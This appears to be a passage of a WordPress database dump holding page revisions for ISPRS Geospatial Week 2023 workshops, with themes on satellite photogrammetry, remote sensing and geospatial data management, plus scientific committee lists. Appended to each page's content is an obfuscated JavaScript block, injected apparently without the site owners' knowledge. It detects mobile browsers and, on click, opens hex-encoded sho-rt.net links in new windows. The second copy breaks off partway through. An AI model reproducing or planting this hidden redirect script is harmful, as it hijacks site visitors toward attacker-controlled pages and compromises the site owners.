left;\">CHAIRS</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"56\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: blue;\"><strong>Themes of the event:</strong></h4>\n<p>&nbsp;</p>\n<h5><strong> Satellite Photogrammetry</strong></h5>\n<ul>\n<li>Stereo/multi-view image-based 3D reconstruction</li>\n<li>Sensor modeling and calibration</li>\n<li>Off-nadir satellite image geometry and true orthorectification</li>\n<li>Application of Neural Radiance Fields (NeRF) in satellite photogrammetry</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Urban Remote Sensing</strong></h5>\n<ul>\n<li>Thermal remote sensing and heat-loss assessment</li>\n<li>Machine/Deep learning for automatic data interpretation and analysis</li>\n<li>Urban area change detection and 2D/3D base map updating</li>\n<li>Disaster assessment, management, and mitigation</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Image integration and data fusion</strong></h5>\n<ul>\n<li>Sensor fusion and multi-modal image processing</li>\n<li>LiDAR and Multispectral data integration</li>\n<li>Hyperspectral image processing and data fusion</li>\n<li>Optical-SAR image integration</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Remote Sensing and sustainable environment</strong></h5>\n<ul>\n<li>Water Resources and Management</li>\n<li>Wastewater and solid waste monitoring</li>\n<li>Weather/atmosphere and climate change</li>\n<li>Forestry/agricultural and ecosystems/biodiversity</li>\n<li>Environmental health applications</li>\n<li>Coastal erosion and cryosphere</li>\n<li>Landuse/landcover mapping and monitoring using artificial intelligence</li>\n<li>Cloud-based image analysis and Google Earth Engine</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Planetary Remote Sensing and Space Agencies program development</strong></h5>\n<ul>\n<li>Planetary Remote Sensing data processing and information extraction</li>\n<li>Cubesat-based earth observation missions</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong> Scientific Committee:</strong></h5>\n<ul>\n<li>Orhan ALTAN, Istanbul Technical University</li>\n<li>Ammatzia Peled, University of Haifa</li>\n<li>Yun Zhang, University of New Brunswick</li>\n<li>Rongxing (Ron) Li, Tongji University</li>\n<li>Marco Scaioni, University Politecnico Milano</li>\n<li>Francesco Pirotti, University of Padova</li>\n<li>Saeid Homayouni, Institut national de la recherche scientifique</li>\n<li>BAHRAM SALEHI, State University of New York</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Satellite Remote Sensing and Its Applications</strong>','','inherit','closed','closed','','2996-revision-v1','','','2023-02-05 14:21:28','2023-02-05 14:21:28','',2996,'https://gsw2023.com/?p=3831',0,'revision','',0),
(3832,1,'2023-02-05 14:21:47','2023-02-05 14:21:47','[vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong></h4>\r\n<h5 style=\"text-align: center;\"><em>Joint workshop of ISPRS WG IV/4 “Data Management for Spatial Scenarios” and ICWG III/IVb “Remote Sensing Data Quality”</em></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3005\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 style=\"text-align: justify; color: black;\">Today’s geospatial and remote sensing scenarios usually require the fusion of geometric, topological, and semantic data from a broad range of sources such as IoT and UAV sensors, mobile devices, BIM, GIS, digital twins, traffic simulations, and Smart Cites. Existing methods for preparation, modelling, and management of these data often cause a significant burden in data analysis processes. It is widely recognized that new advances in geospatial data preparation and management can accelerate the production of analysis-ready data and unlock the power of geospatial analytics. This workshop provides a platform to discuss new ways and best practices to prepare, model, and manage multi-dimensional geospatial and remote sensing data for static and (near) real-time applications. Contributions from academia and industry demonstrating innovative methods and tools, practical approaches, or research in progress are all welcome. The workshop will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related workshops. The event is a one-day single-track workshop of oral presentations and poster/networking sessions in the context of the ISPRS Geospatial Week 2023.</h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"55\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n 	<li>Data Accessibility for Smart Cities and Remote Sensing</li>\r\n 	<li>Data Preparation for Geospatial or Remote Sensing Applications</li>\r\n 	<li>Data Management for Geospatial or Remote Sensing Applications</li>\r\n 	<li>AI Methods to support Geospatial and Remote Sensing Data Preparation or Data Management</li>\r\n 	<li>Database Support for Convolutional Neural Networks and Image Classification</li>\r\n 	<li>Multi-Dimensional (3D/4D/nD) Geospatial Data Modelling and Management</li>\r\n 	<li>nD Data Cubes</li>\r\n 	<li>Big Geospatial Data: Preparation, Modelling and Management</li>\r\n 	<li>Spatio-Temporal and Trajectory Data Management</li>\r\n 	<li>Geospatial Data Streaming and Data Management for Geo-Sensor Networks</li>\r\n 	<li>Data Management for Real-Time Scenarios such as Traffic Simulation and Smart Cities</li>\r\n 	<li>Data Integration for Building Information Models (BIM) and 3D GIS</li>\r\n 	<li>Advanced Data Management Applications: Smart Environment/Cities, Digital Twins, Intelligent Transportation, Convolutional Neural Networks and Image Classification in Remote Sensing</li>\r\n 	<li>Internet of Vehicles (IOV) and Intelligent Transportation Systems (ITS)</li>\r\n 	<li>Geospatial Data Monetization</li>\r\n 	<li>Quality Aspects of Remote Sensing Data Operations (preparation, modelling, management, uncertainty)</li>\r\n 	<li>Remote Sensing for Better Future, Data Management and Quality Aspects of Environmental Monitoring including Biodiversity Analysis</li>\r\n</ul>\r\n<h5><strong><u>Scientific Committee:</u></strong></h5>\r\n<ul>\r\n 	<li>Mulhim Al-Doori, Roads and Transport Authority, United Arab Emirates</li>\r\n 	<li>Arpad Barsi, Budapest University of Technology and Economics, Hungary</li>\r\n 	<li>Mike Batty, University College London, United Kingdom</li>\r\n 	<li>Peter Baumann, Jacobs University, Germany</li>\r\n 	<li>Filip Biljecki, National University of Singapore, Singapore</li>\r\n 	<li>Thomas Blaschke, Paris Lodron University Salzburg, Austria</li>\r\n 	<li>Patrick Bradley, Karlsruhe Institute of Technology, Germany</li>\r\n 	<li>Martin Breunig, Karlsruhe Institute of Technology, Germany</li>\r\n 	<li>Christophe Claramunt, Naval Academy Research Institute, France</li>\r\n 	<li>Volker <a href=\"mailto:alias@utm.my\">Coors,</a> HFT <em>Stuttgart<strong>, </strong></em>Germany</li>\r\n 	<li>Ihab Hamzi Hijazi, Technische Universität München, Germany</li>\r\n 	<li>Umit Isikdag, Istanbul Technical University, Turkey</li>\r\n 	<li>Mojgan A. Jadidi, York University, Canada</li>\r\n 	<li>Markus Jahn, Karlsruhe Institute of Technology, Germany</li>\r\n 	<li>Zsófia Kugler, Budapest University of Technology and Economics, Hungary</li>\r\n 	<li>Paul Vincent Kuper, Karlsruhe Institute of Technology, Germany</li>\r\n 	<li>Bassem Mokhtar, Egypt-Japan University of Science and Technology, Egypt</li>\r\n 	<li>Morakot Pilouk, ESRI Inc.,USA</li>\r\n 	<li>Jacynthe Pouliot, Laval University, Canada</li>\r\n 	<li>Alias Abdol Ramhan, University Technology Malaysia, Malaysia</li>\r\n 	<li>Friederike Reitze, Karlsruhe Institute of Technology, Germany</li>\r\n 	<li>Norbert Rösch, Karlsruhe Institute of Technology, Germany</li>\r\n 	<li>Emmanuel Stefanakis, University of Calgary, Canada</li>\r\n 	<li>Gyorge Szabo, Budapest University of Technology and Economics, Hungary</li>\r\n 	<li>Rami Zewail, Egypt-Japan University of Science and Technology, Egypt</li>\r\n 	<li>Sisi Zlatanova, University of New South Wales, Australia</li>\r\n 	<li>Hussein M. Abdulmuttalib, Dubai Municipality, United Arab Emirates</li>\r\n 	<li>Alex Bruskin, Senticore Technologies LLC, USA<u></u><u></u></li>\r\n</ul>\r\n<h5><u>Supporting ISPRS <strong>Working</strong> Groups:</u></h5>\r\nTo be confirmed by the following and other possible WGs:\r\n<ul>\r\n 	<li>WG II/4 “AI / ML for Geospatial Data”</li>\r\n 	<li>WG IV/2 “Artificial Intelligence and Uncertainty Modeling in Spatial Analysis”</li>\r\n 	<li>WG IV/3 “Geo-Computation and Geo-Simulation”</li>\r\n 	<li>WG IV/9 “Spatially  Enabled Urban and Regional Digital Twins”</li>\r\n</ul>\r\n&nbsp;\r\n<h5><u><strong>Publication of the workshop contributions:</strong> </u></h5>\r\nAccepted full papers and extended abstracts will appear at ISPRS Annals and ISPRS Archives, respectively, dedicated to this symposium after the peer-review process.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 